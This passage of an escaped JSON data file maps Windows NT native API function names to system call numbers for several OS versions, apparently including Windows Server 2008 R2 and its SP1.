\"NtOpenEnlistment\": \"234\", \"NtOpenEventPair\": \"235\", \"NtOpenIoCompletion\": \"236\", \"NtOpenJobObject\": \"237\", \"NtOpenKeyTransacted\": \"238\", \"NtOpenKeyedEvent\": \"239\", \"NtOpenMutant\": \"240\", \"NtOpenObjectAuditAlarm\": \"241\", \"NtOpenPrivateNamespace\": \"242\", \"NtOpenProcessToken\": \"243\", \"NtOpenResourceManager\": \"244\", \"NtOpenSemaphore\": \"245\", \"NtOpenSession\": \"246\", \"NtOpenSymbolicLinkObject\": \"247\", \"NtOpenThread\": \"248\", \"NtOpenTimer\": \"249\", \"NtOpenTransaction\": \"250\", \"NtOpenTransactionManager\": \"251\", \"NtPlugPlayControl\": \"252\", \"NtPrePrepareComplete\": \"253\", \"NtPrePrepareEnlistment\": \"254\", \"NtPrepareComplete\": \"255\", \"NtPrepareEnlistment\": \"256\", \"NtPrivilegeCheck\": \"257\", \"NtPrivilegeObjectAuditAlarm\": \"258\", \"NtPrivilegedServiceAuditAlarm\": \"259\", \"NtPropagationComplete\": \"260\", \"NtPropagationFailed\": \"261\", \"NtPulseEvent\": \"262\", \"NtQueryBootEntryOrder\": \"263\", \"NtQueryBootOptions\": \"264\", \"NtQueryDebugFilterState\": \"265\", \"NtQueryDirectoryObject\": \"266\", \"NtQueryDriverEntryOrder\": \"267\", \"NtQueryEaFile\": \"268\", \"NtQueryFullAttributesFile\": \"269\", \"NtQueryInformationAtom\": \"270\", \"NtQueryInformationEnlistment\": \"271\", \"NtQueryInformationJobObject\": \"272\", \"NtQueryInformationPort\": \"273\", \"NtQueryInformationResourceManager\": \"274\", \"NtQueryInformationTransaction\": \"275\", \"NtQueryInformationTransactionManager\": \"276\", \"NtQueryInformationWorkerFactory\": \"277\", \"NtQueryInstallUILanguage\": \"278\", \"NtQueryIntervalProfile\": \"279\", \"NtQueryIoCompletion\": \"280\", \"NtQueryLicenseValue\": \"281\", \"NtQueryMultipleValueKey\": \"282\", \"NtQueryMutant\": \"283\", \"NtQueryOpenSubKeys\": \"284\", \"NtQueryOpenSubKeysEx\": \"285\", \"NtQueryPortInformationProcess\": \"286\", \"NtQueryQuotaInformationFile\": \"287\", \"NtQuerySecurityObject\": \"288\", \"NtQuerySemaphore\": \"289\", \"NtQuerySymbolicLinkObject\": \"290\", \"NtQuerySystemEnvironmentValue\": \"291\", \"NtQuerySystemEnvironmentValueEx\": \"292\", \"NtQueryTimerResolution\": \"293\", \"NtRaiseException\": \"294\", \"NtRaiseHardError\": \"295\", \"NtReadOnlyEnlistment\": \"296\", \"NtRecoverEnlistment\": \"297\", \"NtRecoverResourceManager\": \"298\", \"NtRecoverTransactionManager\": \"299\", \"NtRegisterProtocolAddressInformation\": \"300\", \"NtRegisterThreadTerminatePort\": \"301\", \"NtReleaseCMFViewOwnership\": \"302\", \"NtReleaseKeyedEvent\": \"303\", \"NtReleaseWorkerFactoryWorker\": \"304\", \"NtRemoveIoCompletionEx\": \"305\", \"NtRemoveProcessDebug\": \"306\", \"NtRenameKey\": \"307\", \"NtRenameTransactionManager\": \"308\", \"NtReplaceKey\": \"309\", \"NtReplacePartitionUnit\": \"310\", \"NtReplyWaitReplyPort\": \"311\", \"NtRequestDeviceWakeup\": \"312\", \"NtRequestPort\": \"313\", \"NtRequestWakeupLatency\": \"314\", \"NtResetEvent\": \"315\", \"NtResetWriteWatch\": \"316\", \"NtRestoreKey\": \"317\", \"NtResumeProcess\": \"318\", \"NtRollbackComplete\": \"319\", \"NtRollbackEnlistment\": \"320\", \"NtRollbackTransaction\": \"321\", \"NtRollforwardTransactionManager\": \"322\", \"NtSaveKey\": \"323\", \"NtSaveKeyEx\": \"324\", \"NtSaveMergedKeys\": \"325\", \"NtSecureConnectPort\": \"326\", \"NtSetBootEntryOrder\": \"327\", \"NtSetBootOptions\": \"328\", \"NtSetContextThread\": \"329\", \"NtSetDebugFilterState\": \"330\", \"NtSetDefaultHardErrorPort\": \"331\", \"NtSetDefaultLocale\": \"332\", \"NtSetDefaultUILanguage\": \"333\", \"NtSetDriverEntryOrder\": \"334\", \"NtSetEaFile\": \"335\", \"NtSetHighEventPair\": \"336\", \"NtSetHighWaitLowEventPair\": \"337\", \"NtSetInformationDebugObject\": \"338\", \"NtSetInformationEnlistment\": \"339\", \"NtSetInformationJobObject\": \"340\", \"NtSetInformationKey\": \"341\", \"NtSetInformationResourceManager\": \"342\", \"NtSetInformationToken\": \"343\", \"NtSetInformationTransaction\": \"344\", \"NtSetInformationTransactionManager\": \"345\", \"NtSetInformationWorkerFactory\": \"346\", \"NtSetIntervalProfile\": \"347\", \"NtSetIoCompletion\": \"348\", \"NtSetLdtEntries\": \"349\", \"NtSetLowEventPair\": \"350\", \"NtSetLowWaitHighEventPair\": \"351\", \"NtSetQuotaInformationFile\": \"352\", \"NtSetSecurityObject\": \"353\", \"NtSetSystemEnvironmentValue\": \"354\", \"NtSetSystemEnvironmentValueEx\": \"355\", \"NtSetSystemInformation\": \"356\", \"NtSetSystemPowerState\": \"357\", \"NtSetSystemTime\": \"358\", \"NtSetThreadExecutionState\": \"359\", \"NtSetTimerResolution\": \"360\", \"NtSetUuidSeed\": \"361\", \"NtSetVolumeInformationFile\": \"362\", \"NtShutdownSystem\": \"363\", \"NtShutdownWorkerFactory\": \"364\", \"NtSignalAndWaitForSingleObject\": \"365\", \"NtSinglePhaseReject\": \"366\", \"NtStartProfile\": \"367\", \"NtStopProfile\": \"368\", \"NtSuspendProcess\": \"369\", \"NtSuspendThread\": \"370\", \"NtSystemDebugControl\": \"371\", \"NtTerminateJobObject\": \"372\", \"NtTestAlert\": \"373\", \"NtThawRegistry\": \"374\", \"NtThawTransactions\": \"375\", \"NtTraceControl\": \"376\", \"NtTranslateFilePath\": \"377\", \"NtUnloadDriver\": \"378\", \"NtUnloadKey\": \"379\", \"NtUnloadKey2\": \"380\", \"NtUnloadKeyEx\": \"381\", \"NtUnlockFile\": \"382\", \"NtUnlockVirtualMemory\": \"383\", \"NtVdmControl\": \"384\", \"NtWaitForDebugEvent\": \"385\", \"NtWaitForKeyedEvent\": \"386\", \"NtWaitForWorkViaWorkerFactory\": \"387\", \"NtWaitHighEventPair\": \"388\", \"NtWaitLowEventPair\": \"389\", \"NtWorkerFactoryWorkerReady\": \"390\"}, \"R2\": {\"NtMapUserPhysicalPagesScatter\": \"0\", \"NtWaitForSingleObject\": \"1\", \"NtCallbackReturn\": \"2\", \"NtReadFile\": \"3\", \"NtDeviceIoControlFile\": \"4\", \"NtWriteFile\": \"5\", \"NtRemoveIoCompletion\": \"6\", \"NtReleaseSemaphore\": \"7\", \"NtReplyWaitReceivePort\": \"8\", \"NtReplyPort\": \"9\", \"NtSetInformationThread\": \"10\", \"NtSetEvent\": \"11\", \"NtClose\": \"12\", \"NtQueryObject\": \"13\", \"NtQueryInformationFile\": \"14\", \"NtOpenKey\": \"15\", \"NtEnumerateValueKey\": \"16\", \"NtFindAtom\": \"17\", \"NtQueryDefaultLocale\": \"18\", \"NtQueryKey\": \"19\", \"NtQueryValueKey\": \"20\", \"NtAllocateVirtualMemory\": \"21\", \"NtQueryInformationProcess\": \"22\", \"NtWaitForMultipleObjects32\": \"23\", \"NtWriteFileGather\": \"24\", \"NtSetInformationProcess\": \"25\", \"NtCreateKey\": \"26\", \"NtFreeVirtualMemory\": \"27\", \"NtImpersonateClientOfPort\": \"28\", \"NtReleaseMutant\": \"29\", \"NtQueryInformationToken\": \"30\", \"NtRequestWaitReplyPort\": \"31\", \"NtQueryVirtualMemory\": \"32\", \"NtOpenThreadToken\": \"33\", \"NtQueryInformationThread\": \"34\", \"NtOpenProcess\": \"35\", \"NtSetInformationFile\": \"36\", \"NtMapViewOfSection\": \"37\", \"NtAccessCheckAndAuditAlarm\": \"38\", \"NtUnmapViewOfSection\": \"39\", \"NtReplyWaitReceivePortEx\": \"40\", \"NtTerminateProcess\": \"41\", \"NtSetEventBoostPriority\": \"42\", \"NtReadFileScatter\": \"43\", \"NtOpenThreadTokenEx\": \"44\", \"NtOpenProcessTokenEx\": \"45\", \"NtQueryPerformanceCounter\": \"46\", \"NtEnumerateKey\": \"47\", \"NtOpenFile\": \"48\", \"NtDelayExecution\": \"49\", \"NtQueryDirectoryFile\": \"50\", \"NtQuerySystemInformation\": \"51\", \"NtOpenSection\": \"52\", \"NtQueryTimer\": \"53\", \"NtFsControlFile\": \"54\", \"NtWriteVirtualMemory\": \"55\", \"NtCloseObjectAuditAlarm\": \"56\", \"NtDuplicateObject\": \"57\", \"NtQueryAttributesFile\": \"58\", \"NtClearEvent\": \"59\", \"NtReadVirtualMemory\": \"60\", \"NtOpenEvent\": \"61\", \"NtAdjustPrivilegesToken\": \"62\", \"NtDuplicateToken\": \"63\", \"NtContinue\": \"64\", \"NtQueryDefaultUILanguage\": \"65\", \"NtQueueApcThread\": \"66\", \"NtYieldExecution\": \"67\", \"NtAddAtom\": \"68\", \"NtCreateEvent\": \"69\", \"NtQueryVolumeInformationFile\": \"70\", \"NtCreateSection\": \"71\", \"NtFlushBuffersFile\": \"72\", \"NtApphelpCacheControl\": \"73\", \"NtCreateProcessEx\": \"74\", \"NtCreateThread\": \"75\", \"NtIsProcessInJob\": \"76\", \"NtProtectVirtualMemory\": \"77\", \"NtQuerySection\": \"78\", \"NtResumeThread\": \"79\", \"NtTerminateThread\": \"80\", \"NtReadRequestData\": \"81\", \"NtCreateFile\": \"82\", \"NtQueryEvent\": \"83\", \"NtWriteRequestData\": \"84\", \"NtOpenDirectoryObject\": \"85\", \"NtAccessCheckByTypeAndAuditAlarm\": \"86\", \"NtQuerySystemTime\": \"87\", \"NtWaitForMultipleObjects\": \"88\", \"NtSetInformationObject\": \"89\", \"NtCancelIoFile\": \"90\", \"NtTraceEvent\": \"91\", \"NtPowerInformation\": \"92\", \"NtSetValueKey\": \"93\", \"NtCancelTimer\": \"94\", \"NtSetTimer\": \"95\", \"NtAcceptConnectPort\": \"96\", \"NtAccessCheck\": \"97\", \"NtAccessCheckByType\": \"98\", \"NtAccessCheckByTypeResultList\": \"99\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"101\", \"NtAddBootEntry\": \"102\", \"NtAddDriverEntry\": \"103\", \"NtAdjustGroupsToken\": \"104\", \"NtAlertResumeThread\": \"105\", \"NtAlertThread\": \"106\", \"NtAllocateLocallyUniqueId\": \"107\", \"NtAllocateReserveObject\": \"108\", \"NtAllocateUserPhysicalPages\": \"109\", \"NtAllocateUuids\": \"110\", \"NtAlpcAcceptConnectPort\": \"111\", \"NtAlpcCancelMessage\": \"112\", \"NtAlpcConnectPort\": \"113\", \"NtAlpcCreatePort\": \"114\", \"NtAlpcCreatePortSection\": \"115\", \"NtAlpcCreateResourceReserve\": \"116\", \"NtAlpcCreateSectionView\": \"117\", \"NtAlpcCreateSecurityContext\": \"118\", \"NtAlpcDeletePortSection\": \"119\", \"NtAlpcDeleteResourceReserve\": \"120\", \"NtAlpcDeleteSectionView\": \"121\", \"NtAlpcDeleteSecurityContext\": \"122\", \"NtAlpcDisconnectPort\": \"123\", \"NtAlpcImpersonateClientOfPort\": \"124\", \"NtAlpcOpenSenderProcess\": \"125\", \"NtAlpcOpenSenderThread\": \"126\", \"NtAlpcQueryInformation\": \"127\", \"NtAlpcQueryInformationMessage\": \"128\", \"NtAlpcRevokeSecurityContext\": \"129\", \"NtAlpcSendWaitReceivePort\": \"130\", \"NtAlpcSetInformation\": \"131\", \"NtAreMappedFilesTheSame\": \"132\", \"NtAssignProcessToJobObject\": \"133\", \"NtCancelIoFileEx\": \"134\", \"NtCancelSynchronousIoFile\": \"135\", \"NtCommitComplete\": \"136\", \"NtCommitEnlistment\": \"137\", \"NtCommitTransaction\": \"138\", \"NtCompactKeys\": \"139\", \"NtCompareTokens\": \"140\", \"NtCompleteConnectPort\": \"141\", \"NtCompressKey\": \"142\", \"NtConnectPort\": \"143\", \"NtCreateDebugObject\": \"144\", \"NtCreateDirectoryObject\": \"145\", \"NtCreateEnlistment\": \"146\", \"NtCreateEventPair\": \"147\", \"NtCreateIoCompletion\": \"148\", \"NtCreateJobObject\": \"149\", \"NtCreateJobSet\": \"150\", \"NtCreateKeyTransacted\": \"151\", \"NtCreateKeyedEvent\": \"152\", \"NtCreateMailslotFile\": \"153\", \"NtCreateMutant\": \"154\", \"NtCreateNamedPipeFile\": \"155\", \"NtCreatePagingFile\": \"156\", \"NtCreatePort\": \"157\", \"NtCreatePrivateNamespace\": \"158\", \"NtCreateProcess\": \"159\", \"NtCreateProfile\": \"160\", \"NtCreateProfileEx\": \"161\", \"NtCreateResourceManager\": \"162\", \"NtCreateSemaphore\": \"163\", \"NtCreateSymbolicLinkObject\": \"164\", \"NtCreateThreadEx\": \"165\", \"NtCreateTimer\": \"166\", \"NtCreateToken\": \"167\", \"NtCreateTransaction\": \"168\", \"NtCreateTransactionManager\": \"169\", \"NtCreateUserProcess\": \"170\", \"NtCreateWaitablePort\": \"171\", \"NtCreateWorkerFactory\": \"172\", \"NtDebugActiveProcess\": \"173\", \"NtDebugContinue\": \"174\", \"NtDeleteAtom\": \"175\", \"NtDeleteBootEntry\": \"176\", \"NtDeleteDriverEntry\": \"177\", \"NtDeleteFile\": \"178\", \"NtDeleteKey\": \"179\", \"NtDeleteObjectAuditAlarm\": \"180\", \"NtDeletePrivateNamespace\": \"181\", \"NtDeleteValueKey\": \"182\", \"NtDisableLastKnownGood\": \"183\", \"NtDisplayString\": \"184\", \"NtDrawText\": \"185\", \"NtEnableLastKnownGood\": \"186\", \"NtEnumerateBootEntries\": \"187\", \"NtEnumerateDriverEntries\": \"188\", \"NtEnumerateSystemEnvironmentValuesEx\": \"189\", \"NtEnumerateTransactionObject\": \"190\", \"NtExtendSection\": \"191\", \"NtFilterToken\": \"192\", \"NtFlushInstallUILanguage\": \"193\", \"NtFlushInstructionCache\": \"194\", \"NtFlushKey\": \"195\", \"NtFlushProcessWriteBuffers\": \"196\", \"NtFlushVirtualMemory\": \"197\", \"NtFlushWriteBuffer\": \"198\", \"NtFreeUserPhysicalPages\": \"199\", \"NtFreezeRegistry\": \"200\", \"NtFreezeTransactions\": \"201\", \"NtGetContextThread\": \"202\", \"NtGetCurrentProcessorNumber\": \"203\", \"NtGetDevicePowerState\": \"204\", \"NtGetMUIRegistryInfo\": \"205\", \"NtGetNextProcess\": \"206\", \"NtGetNextThread\": \"207\", \"NtGetNlsSectionPtr\": \"208\", \"NtGetNotificationResourceManager\": \"209\", \"NtGetPlugPlayEvent\": \"210\", \"NtGetWriteWatch\": \"211\", \"NtImpersonateAnonymousToken\": \"212\", \"NtImpersonateThread\": \"213\", \"NtInitializeNlsFiles\": \"214\", \"NtInitializeRegistry\": \"215\", \"NtInitiatePowerAction\": \"216\", \"NtIsSystemResumeAutomatic\": \"217\", \"NtIsUILanguageComitted\": \"218\", \"NtListenPort\": \"219\", \"NtLoadDriver\": \"220\", \"NtLoadKey\": \"221\", \"NtLoadKey2\": \"222\", \"NtLoadKeyEx\": \"223\", \"NtLockFile\": \"224\", \"NtLockProductActivationKeys\": \"225\", \"NtLockRegistryKey\": \"226\", \"NtLockVirtualMemory\": \"227\", \"NtMakePermanentObject\": \"228\", \"NtMakeTemporaryObject\": \"229\", \"NtMapCMFModule\": \"230\", \"NtMapUserPhysicalPages\": \"231\", \"NtModifyBootEntry\": \"232\", \"NtModifyDriverEntry\": \"233\", \"NtNotifyChangeDirectoryFile\": \"234\", \"NtNotifyChangeKey\": \"235\", \"NtNotifyChangeMultipleKeys\": \"236\", \"NtNotifyChangeSession\": \"237\", \"NtOpenEnlistment\": \"238\", \"NtOpenEventPair\": \"239\", \"NtOpenIoCompletion\": \"240\", \"NtOpenJobObject\": \"241\", \"NtOpenKeyEx\": \"242\", \"NtOpenKeyTransacted\": \"243\", \"NtOpenKeyTransactedEx\": \"244\", \"NtOpenKeyedEvent\": \"245\", \"NtOpenMutant\": \"246\", \"NtOpenObjectAuditAlarm\": \"247\", \"NtOpenPrivateNamespace\": \"248\", \"NtOpenProcessToken\": \"249\", \"NtOpenResourceManager\": \"250\", \"NtOpenSemaphore\": \"251\", \"NtOpenSession\": \"252\", \"NtOpenSymbolicLinkObject\": \"253\", \"NtOpenThread\": \"254\", \"NtOpenTimer\": \"255\", \"NtOpenTransaction\": \"256\", \"NtOpenTransactionManager\": \"257\", \"NtPlugPlayControl\": \"258\", \"NtPrePrepareComplete\": \"259\", \"NtPrePrepareEnlistment\": \"260\", \"NtPrepareComplete\": \"261\", \"NtPrepareEnlistment\": \"262\", \"NtPrivilegeCheck\": \"263\", \"NtPrivilegeObjectAuditAlarm\": \"264\", \"NtPrivilegedServiceAuditAlarm\": \"265\", \"NtPropagationComplete\": \"266\", \"NtPropagationFailed\": \"267\", \"NtPulseEvent\": \"268\", \"NtQueryBootEntryOrder\": \"269\", \"NtQueryBootOptions\": \"270\", \"NtQueryDebugFilterState\": \"271\", \"NtQueryDirectoryObject\": \"272\", \"NtQueryDriverEntryOrder\": \"273\", \"NtQueryEaFile\": \"274\", \"NtQueryFullAttributesFile\": \"275\", \"NtQueryInformationAtom\": \"276\", \"NtQueryInformationEnlistment\": \"277\", \"NtQueryInformationJobObject\": \"278\", \"NtQueryInformationPort\": \"279\", \"NtQueryInformationResourceManager\": \"280\", \"NtQueryInformationTransaction\": \"281\", \"NtQueryInformationTransactionManager\": \"282\", \"NtQueryInformationWorkerFactory\": \"283\", \"NtQueryInstallUILanguage\": \"284\", \"NtQueryIntervalProfile\": \"285\", \"NtQueryIoCompletion\": \"286\", \"NtQueryLicenseValue\": \"287\", \"NtQueryMultipleValueKey\": \"288\", \"NtQueryMutant\": \"289\", \"NtQueryOpenSubKeys\": \"290\", \"NtQueryOpenSubKeysEx\": \"291\", \"NtQueryPortInformationProcess\": \"292\", \"NtQueryQuotaInformationFile\": \"293\", \"NtQuerySecurityAttributesToken\": \"294\", \"NtQuerySecurityObject\": \"295\", \"NtQuerySemaphore\": \"296\", \"NtQuerySymbolicLinkObject\": \"297\", \"NtQuerySystemEnvironmentValue\": \"298\", \"NtQuerySystemEnvironmentValueEx\": \"299\", \"NtQuerySystemInformationEx\": \"300\", \"NtQueryTimerResolution\": \"301\", \"NtQueueApcThreadEx\": \"302\", \"NtRaiseException\": \"303\", \"NtRaiseHardError\": \"304\", \"NtReadOnlyEnlistment\": \"305\", \"NtRecoverEnlistment\": \"306\", \"NtRecoverResourceManager\": \"307\", \"NtRecoverTransactionManager\": \"308\", \"NtRegisterProtocolAddressInformation\": \"309\", \"NtRegisterThreadTerminatePort\": \"310\", \"NtReleaseKeyedEvent\": \"311\", \"NtReleaseWorkerFactoryWorker\": \"312\", \"NtRemoveIoCompletionEx\": \"313\", \"NtRemoveProcessDebug\": \"314\", \"NtRenameKey\": \"315\", \"NtRenameTransactionManager\": \"316\", \"NtReplaceKey\": \"317\", \"NtReplacePartitionUnit\": \"318\", \"NtReplyWaitReplyPort\": \"319\", \"NtRequestPort\": \"320\", \"NtResetEvent\": \"321\", \"NtResetWriteWatch\": \"322\", \"NtRestoreKey\": \"323\", \"NtResumeProcess\": \"324\", \"NtRollbackComplete\": \"325\", \"NtRollbackEnlistment\": \"326\", \"NtRollbackTransaction\": \"327\", \"NtRollforwardTransactionManager\": \"328\", \"NtSaveKey\": \"329\", \"NtSaveKeyEx\": \"330\", \"NtSaveMergedKeys\": \"331\", \"NtSecureConnectPort\": \"332\", \"NtSerializeBoot\": \"333\", \"NtSetBootEntryOrder\": \"334\", \"NtSetBootOptions\": \"335\", \"NtSetContextThread\": \"336\", \"NtSetDebugFilterState\": \"337\", \"NtSetDefaultHardErrorPort\": \"338\", \"NtSetDefaultLocale\": \"339\", \"NtSetDefaultUILanguage\": \"340\", \"NtSetDriverEntryOrder\": \"341\", \"NtSetEaFile\": \"342\", \"NtSetHighEventPair\": \"343\", \"NtSetHighWaitLowEventPair\": \"344\", \"NtSetInformationDebugObject\": \"345\", \"NtSetInformationEnlistment\": \"346\", \"NtSetInformationJobObject\": \"347\", \"NtSetInformationKey\": \"348\", \"NtSetInformationResourceManager\": \"349\", \"NtSetInformationToken\": \"350\", \"NtSetInformationTransaction\": \"351\", \"NtSetInformationTransactionManager\": \"352\", \"NtSetInformationWorkerFactory\": \"353\", \"NtSetIntervalProfile\": \"354\", \"NtSetIoCompletion\": \"355\", \"NtSetIoCompletionEx\": \"356\", \"NtSetLdtEntries\": \"357\", \"NtSetLowEventPair\": \"358\", \"NtSetLowWaitHighEventPair\": \"359\", \"NtSetQuotaInformationFile\": \"360\", \"NtSetSecurityObject\": \"361\", \"NtSetSystemEnvironmentValue\": \"362\", \"NtSetSystemEnvironmentValueEx\": \"363\", \"NtSetSystemInformation\": \"364\", \"NtSetSystemPowerState\": \"365\", \"NtSetSystemTime\": \"366\", \"NtSetThreadExecutionState\": \"367\", \"NtSetTimerEx\": \"368\", \"NtSetTimerResolution\": \"369\", \"NtSetUuidSeed\": \"370\", \"NtSetVolumeInformationFile\": \"371\", \"NtShutdownSystem\": \"372\", \"NtShutdownWorkerFactory\": \"373\", \"NtSignalAndWaitForSingleObject\": \"374\", \"NtSinglePhaseReject\": \"375\", \"NtStartProfile\": \"376\", \"NtStopProfile\": \"377\", \"NtSuspendProcess\": \"378\", \"NtSuspendThread\": \"379\", \"NtSystemDebugControl\": \"380\", \"NtTerminateJobObject\": \"381\", \"NtTestAlert\": \"382\", \"NtThawRegistry\": \"383\", \"NtThawTransactions\": \"384\", \"NtTraceControl\": \"385\", \"NtTranslateFilePath\": \"386\", \"NtUmsThreadYield\": \"387\", \"NtUnloadDriver\": \"388\", \"NtUnloadKey\": \"389\", \"NtUnloadKey2\": \"390\", \"NtUnloadKeyEx\": \"391\", \"NtUnlockFile\": \"392\", \"NtUnlockVirtualMemory\": \"393\", \"NtVdmControl\": \"394\", \"NtWaitForDebugEvent\": \"395\", \"NtWaitForKeyedEvent\": \"396\", \"NtWaitForWorkViaWorkerFactory\": \"397\", \"NtWaitHighEventPair\": \"398\", \"NtWaitLowEventPair\": \"399\", \"NtWorkerFactoryWorkerReady\": \"400\"}, \"R2 SP1\": {\"NtMapUserPhysicalPagesScatter\": \"0\", \"NtWaitForSingleObject\": \"1\", \"NtCallbackReturn\": \"2\", \"NtReadFile\": \"3\", \"NtDeviceIoControlFile\": \"4\", \"NtWriteFile\": \"5\", \"NtRemoveIoCompletion\": \"6\", \"NtReleaseSemaphore\": \"7\", \"NtReplyWaitReceivePort\": \"8\", \"NtReplyPort\": \"9\", \"NtSetInformationThread\": \"10\", \"NtSetEvent\": \"11\", \"NtClose\": \"12\", \"NtQueryObject\": \"13\", \"NtQueryInformationFile\": \"14\", \"NtOpenKey\": \"15\", \"NtEnumerateValueKey\": \"16\", \"NtFindAtom\": \"17\", \"NtQueryDefaultLocale\": \"18\", \"NtQueryKey\": \"19\", \"NtQueryValueKey\": \"20\", \"NtAllocateVirtualMemory\": \"21\", \"NtQueryInformationProcess\": \"22\", \"NtWaitForMultipleObjects32\": \"23\", \"NtWriteFileGather\": \"24\", \"NtSetInformationProcess\": \"25\", \"NtCreateKey\": \"26\", \"NtFreeVirtualMemory\": \"27\", \"NtImpersonateClientOfPort\": \"28\", \"NtReleaseMutant\": \"29\", \"NtQueryInformationToken\": \"30\", \"NtRequestWaitReplyPort\": \"31\", \"NtQueryVirtualMemory\": \"32\", \"NtOpenThreadToken\": \"33\", \"NtQueryInformationThread\": \"34\", \"NtOpenProcess\": \"35\", \"NtSetInformationFile\": \"36\", \"NtMapViewOfSection\": \"37\", \"NtAccessCheckAndAuditAlarm\": \"38\", \"NtUnmapViewOfSection\": \"39\", \"NtReplyWaitReceivePortEx\": \"40\", \"NtTerminateProcess\": \"41\", \"NtSetEventBoostPriority\": \"42\", \"NtReadFileScatter\": \"43\", \"NtOpenThreadTokenEx\": \"44\", \"NtOpenProcessTokenEx\": \"45\", \"NtQueryPerformanceCounter\": \"46\", \"NtEnumerateKey\": \"47\", \"NtOpenFile\": \"48\", \"NtDelayExecution\": \"49\", \"NtQueryDirectoryFile\": \"50\", \"NtQuerySystemInformation\": \"51\", \"NtOpenSection\": \"52\", \"NtQueryTimer\": \"53\", \"NtFsControlFile\": \"54\", \"NtWriteVirtualMemory\": \"55\", \"NtCloseObjectAuditAlarm\": \"56\", \"NtDuplicateObject\": \"57\", \"NtQueryAttributesFile\": \"58\", \"NtClearEvent\": \"59\", \"NtReadVirtualMemory\": \"60\", \"NtOpenEvent\": \"61\", \"NtAdjustPrivilegesToken\": \"62\", \"NtDuplicateToken\": \"63\", \"NtContinue\": \"64\", \"NtQueryDefaultUILanguage\": \"65\", \"NtQueueApcThread\": \"66\", \"NtYieldExecution\": \"67\", \"NtAddAtom\": \"68\", \"NtCreateEvent\": \"69\", \"NtQueryVolumeInformationFile\": \"70\", \"NtCreateSection\": \"71\", \"NtFlushBuffersFile\": \"72\", \"NtApphelpCacheControl\": \"73\", \"NtCreateProcessEx\": \"74\", \"NtCreateThread\": \"75\", \"NtIsProcessInJob\": \"76\", \"NtProtectVirtualMemory\": \"77\", \"NtQuerySection\": \"78\", \"NtResumeThread\": \"79\", \"NtTerminateThread\": \"80\", \"NtReadRequestData\": \"81\", \"NtCreateFile\": \"82\", \"NtQueryEvent\": \"83\", \"NtWriteRequestData\": \"84\", \"NtOpenDirectoryObject\": \"85\", \"NtAccessCheckByTypeAndAuditAlarm\": \"86\", \"NtQuerySystemTime\": \"87\", \"NtWaitForMultipleObjects\": \"88\", \"NtSetInformationObject\": \"89\", \"NtCancelIoFile\": \"90\", \"NtTraceEvent\": \"91\", \"NtPowerInformation\": \"92\", \"NtSetValueKey\": \"93\", \"NtCancelTimer\": \"94\", \"NtSetTimer\": \"95\", \"NtAcceptConnectPort\": \"96\", \"NtAccessCheck\": \"97\", \"NtAccessCheckByType\": \"98\", \"NtAccessCheckByTypeResultList\": \"99\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"101\", \"NtAddBootEntry\": \"102\", \"NtAddDriverEntry\": \"103\", \"NtAdjustGroupsToken\": \"104\", \"NtAlertResumeThread\": \"105\", \"NtAlertThread\": \"106\", \"NtAllocateLocallyUniqueId\": \"107\", \"NtAllocateReserveObject\": \"108\", \"NtAllocateUserPhysicalPages\": \"109\", \"NtAllocateUuids\": \"110\", \"NtAlpcAcceptConnectPort\": \"111\", \"NtAlpcCancelMessage\": \"112\", \"NtAlpcConnectPort\": \"113\", \"NtAlpcCreatePort\": \"114\", \"NtAlpcCreatePortSection\": \"115\", \"NtAlpcCreateResourceReserve\": \"116\", \"NtAlpcCreateSectionView\": \"117\", \"NtAlpcCreateSecurityContext\": \"118\", \"NtAlpcDeletePortSection\": \"119\", \"NtAlpcDeleteResourceReserve\": \"120\", \"NtAlpcDeleteSectionView\": \"121\", \"NtAlpcDeleteSecurityContext\": \"122\", \"NtAlpcDisconnectPort\": \"123\", \"NtAlpcImpersonateClientOfPort\": \"124\", \"NtAlpcOpenSenderProcess\": \"125\", \"NtAlpcOpenSenderThread\": \"126\", \"NtAlpcQueryInformation\": \"127\", \"NtAlpcQueryInformationMessage\": \"128\", \"NtAlpcRevokeSecurityContext\": \"129\", \"NtAlpcSendWaitReceivePort\": \"130\", \"NtAlpcSetInformation\": \"131\", \"NtAreMappedFilesTheSame\": \"132\", \"NtAssignProcessToJobObject\": \"133\", \"NtCancelIoFileEx\": \"134\", \"NtCancelSynchronousIoFile\": \"135\", \"NtCommitComplete\": \"136\", \"NtCommitEnlistment\": \"137\", \"NtCommitTransaction\": \"138\", \"NtCompactKeys\": \"139\", \"NtCompareTokens\": \"140\", \"NtCompleteConnectPort\": \"141\", \"NtCompressKey\": \"142\", \"NtConnectPort\": \"143\", \"NtCreateDebugObject\": \"144\", \"NtCreateDirectoryObject\": \"145\", \"NtCreateEnlistment\": \"146\", \"NtCreateEventPair\": \"147\", \"NtCreateIoCompletion\": \"148\", \"NtCreateJobObject\": \"149\", \"NtCreateJobSet\": \"150\", \"NtCreateKeyTransacted\": \"151\", \"NtCreateKeyedEvent\": \"152\", \"NtCreateMailslotFile\": \"153\", \"NtCreateMutant\": \"154\", \"NtCreateNamedPipeFile\": \"155\", \"NtCreatePagingFile\": \"156\", \"NtCreatePort\": \"157\", \"NtCreatePrivateNamespace\": \"158\", \"NtCreateProcess\": \"159\", \"NtCreateProfile\": \"160\", \"NtCreateProfileEx\": \"161\", \"NtCreateResourceManager\": \"162\", \"NtCreateSemaphore\": \"163\", \"NtCreateSymbolicLinkObject\": \"164\", \"NtCreateThreadEx\": \"165\", \"NtCreateTimer\": \"166\", \"NtCreateToken\": \"167\", \"NtCreateTransaction\": \"168\", \"NtCreateTransactionManager\": \"169\", \"NtCreateUserProcess\": \"170\", \"NtCreateWaitablePort\": \"171\", \"NtCreateWorkerFactory\": \"172\", \"NtDebugActiveProcess\": \"173\", \"NtDebugContinue\": \"174\", \"NtDeleteAtom\": \"175\", \"NtDeleteBootEntry\": \"176\", \"NtDeleteDriverEntry\": \"177\", \"NtDeleteFile\": \"178\", \"NtDeleteKey\": \"179\", \"NtDeleteObjectAuditAlarm\": \"180\", \"NtDeletePrivateNamespace\": \"181\", \"NtDeleteValueKey\": \"182\", \"NtDisableLastKnownGood\": \"183\", \"NtDisplayString\": \"184\", \"NtDrawText\": \"185\", \"NtEnableLastKnownGood\": \"186\", \"NtEnumerateBootEntries\": \"187\", \"NtEnumerateDriverEntries\": \"188\", \"NtEnumerateSystemEnvironmentValuesEx\": \"189\", \"NtEnumerateTransactionObject\": \"190\", \"NtExtendSection\": \"191\", 